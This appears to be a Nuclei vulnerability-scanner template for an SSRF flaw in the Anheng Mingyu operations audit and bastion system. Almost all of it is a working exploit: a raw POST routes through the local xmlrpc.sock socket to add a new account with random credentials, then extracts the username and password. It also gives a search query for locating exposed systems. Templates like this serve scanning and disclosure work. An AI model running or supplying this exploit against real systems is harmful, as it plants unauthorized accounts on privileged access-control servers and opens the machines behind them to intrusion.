id: mingyu-xmlrpc-sock-adduser

info:
  name: Mingyu Operation xmlrpc.sock - User Addition
  author: SleepingBag945
  severity: high
  description: |
    There is an SSRF vulnerability in the xmlrpc.sock interface of Anheng Mingyu operation and maintenance audit and risk control system, through which any user can be added to control the bastion machine
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E4%B8%8E%E9%A3%8E%E9%99%A9%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20xmlrpc.sock%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    max-request: 1
    verified: true
    fofa-query: "明御运维审计与风险控制系统"
  tags: mingyu,xmlrpc,sock,intrusive,misconfig

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  random: "{{rand_base(4)}}"

http:
  - raw:
      - |
        POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{random}}/wsrpc HTTP/1.1
        Host: {{Hostname}}

        web.user_add admin 5 10.0.0.1 uname {{username}} name {{username}} pwd {{password}} authmode 1 deptid email mobile comment roleid 102

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/xml") && contains(body, "rolename") && contains(body, "authmode")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USERNAME: "+ username'
          - '"PASSWORD: "+ password'